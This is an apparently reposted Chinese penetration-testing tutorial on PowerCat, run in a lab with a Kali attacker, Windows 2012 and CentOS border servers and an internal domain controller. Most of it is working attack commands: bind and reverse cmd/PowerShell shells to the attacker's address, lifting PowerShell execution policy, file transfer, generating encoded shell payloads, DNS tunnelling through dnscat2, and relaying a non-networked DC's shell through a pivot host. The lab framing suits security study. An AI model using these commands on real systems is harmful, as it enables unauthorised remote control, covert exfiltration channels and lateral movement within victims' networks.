标签：10.1 PowerCat powercat 渗透 kali 192.168 地址 4444 传输层

写在前面：PowerCat是PowerShell版本的nc，主要用于windows平台。

1 实验环境

kali（攻击机，外网地址：192.168.8.48）
Windows2012（边界服务器，外网地址：192.168.8.57，内网地址：10.1.1.10）
CentOS7（边界服务器，外网地址：192.168.8.35，内网地址：10.1.1.13）
DC（内网地址：10.1.1.2）

2 下载与部署

2.1 下载

下载地址：https://github.com/besimorhino/powercat

2.2 导入

Import-Module .\powercat.ps1

可能会出现ps权限不足的情况：

修改ps权限后再导入（需要管理员权限）：

Set-ExecutionPolicy Unrestricted
y
Import-Module .\powercat.ps1

3 使用方法

3.1 nc 正向连接PowerCat

3.1.1 边界服务器

Windows2012（边界服务器，外网地址：192.168.8.57，内网地址：10.1.1.10）

powercat -l -p 4444 -e cmd.exe -v
# 监听4444端口
powercat -l -p 4444 -ep -v
# 回连powershell

3.1.2 攻击机

kali（攻击机，外网地址：192.168.8.48）

nc 192.168.8.57 4444 -vv

3.2 PowerCat 反向连接nc

3.2.1 攻击机

kali（攻击机，外网地址：192.168.8.48）

nc -l -p 4444 -vv
# 监听4444端口

3.2.2 边界服务器

Windows2012（边界服务器，外网地址：192.168.8.57，内网地址：10.1.1.10）

powercat -c 192.168.8.48 -p 4444 -v -e cmd.exe
# 返回cmd
powercat -c 192.168.8.48 -p 4444 -v -ep
# 返回powershell

返回cmd：

kali上成功接收：

返回powershell：

3.3 文件传输

3.3.1 接收方

DC（内网地址：10.1.1.2）

powercat -l -p 4444 -of C:\Windows\Temp\1.txt -v
# -of：文件储存位置及名称

3.3.2 发送方

边界服务器

Windows2012（边界服务器，外网地址：192.168.8.57，内网地址：10.1.1.10）

powercat -c 10.1.1.2 -p 4444 -i C:\Windows\Temp\1.txt -v
# -i：文件发送路径及名称

可在里面追加内容，如果不需要追加，Ctrl+C传输结束。

3.4 生成PowerShell payload

连接方式同上，正向nc连接powercat，反向powercat反弹到nc。只是将受害机的执行方式变为了ps脚本。
主要用到的参数：

-g：生成powershell payload
-ge：生成经过编码的payload
# 经过编码的payload利用方式：powershell -E 编码后的payload

3.4.1 正向shell

1. 生成payload：

powercat -l -p 4444 -e cmd.exe -v -g >> shell.ps1
# -p指定监听端口

2. 在受害机执行payload：
   
3. kali正向连接：

nc 192.168.8.57 4444 -vv

3.4.2 反弹shell

1. kali开启监听

nc -l -p 4444 -vv

2. 生成反弹shell payload：

powercat -c 192.168.8.48 -p 4444 -v -e cmd.exe -g >> shell.ps1

3. 执行payload：

3.5 PowerCat DNS 隧道通信

powercat的dns通信服务端是基于dnscat设计的，所以需要先安装服务端。

3.5.1 下载与部署

dnscat下载地址：https://github.com/iagox86/dnscat2/tags

kali（攻击机，外网地址：192.168.8.48）

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
gem install bundler
bundle install

3.5.2 使用方法

攻击机

kali（攻击机，外网地址：192.168.8.48）

ruby dnscat2.rb ttpowercat.test -e open --no-cache

受害机

Windows2012（边界服务器，外网地址：192.168.8.57，内网地址：10.1.1.10）

powercat -c 192.168.8.48 -p 53 -dns ttpowercat.test -e cmd.exe

kali成功接收到一个session，session为1，输入

session -i 1

进入会话即可：

3.6 内网转发

假设kali（攻击机，外网地址：192.168.8.48）拿到了Windows2012（边界服务器，外网地址：192.168.8.57，内网地址：10.1.1.10），通过Windows2012又拿到了DC（内网地址：10.1.1.2）的权限，但是DC不出网，这时可以利用Windows2012作为跳板机将DC的shell转发到kali上。

3.6.1 nc作为服务端（TCP协议）

DC（内网地址：10.1.1.2）

powercat -l -v -p 4444 -e cmd.exe
# 监听4444

Windows2012（边界服务器，外网地址：192.168.8.57，内网地址：10.1.1.10）

powercat -l -v -p 5555 -r tcp:10.1.1.2:4444
# 监听5555

kali（攻击机，外网地址：192.168.8.48）

nc 192.168.8.57 5555 -vv

成功获取到DC的shell：

3.6.2 dnscat作为服务端（dns协议）

kali（攻击机，外网地址：192.168.8.48）

ruby dnscat2.rb ttpowercat.test -e open --no-cache

Windows2012（边界服务器，外网地址：192.168.8.57，内网地址：10.1.1.10）

powercat -l -p 4444 -r dns:192.168.8.48::ttpowercat.test
# 监听4444发送给攻击机

DC（内网地址：10.1.1.2）

powercat -c 10.1.1.10 -p 4444 -e cmd.exe -v
# 将shell反弹给跳板机

成功获得DC的shell：

标签：10.1,PowerCat,powercat,渗透,kali,192.168,地址,4444,传输层
来源： https://blog.csdn.net/qq_44874645/article/details/120900645

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。